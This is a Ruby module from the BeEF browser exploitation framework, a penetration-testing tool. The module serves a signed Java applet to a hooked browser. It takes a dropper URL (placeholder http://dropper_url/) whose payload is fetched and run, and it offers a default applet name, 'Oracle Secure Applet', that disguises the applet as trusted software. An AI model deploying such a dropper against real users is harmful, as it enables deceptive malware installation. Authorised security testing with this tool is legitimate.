beef/modules/exploits/local_host/signed_applet_dropper/module.rb

#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Signed_applet_dropper < BeEF::Core::Command
  def pre_send
    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/local_host/signed_applet_dropper/applet/SignedApplet.jar', '/applet/SignedApplet', 'jar')
    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/local_host/signed_applet_dropper/applet/SM.class', '/applet/SM', 'class')
    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/local_host/signed_applet_dropper/applet/SignedApplet.class', '/applet/SignedApplet', 'class')
  end

  def self.options
    [
      { 'name' => 'dropper_url', 'ui_label' => 'Dropper URL', 'value' => 'http://dropper_url/' },
      { 'name' => 'applet_name', 'ui_label' => 'Applet name', 'value' => 'Oracle Secure Applet' },
      { 'name' => 'ie_only', 'ui_label' => 'Internet Explorer only?', 'type' => 'checkbox', 'checked' => 'checked' }
    ]
  end

  def post_execute
    save({ 'result' => @datastore['result'] })
  end
end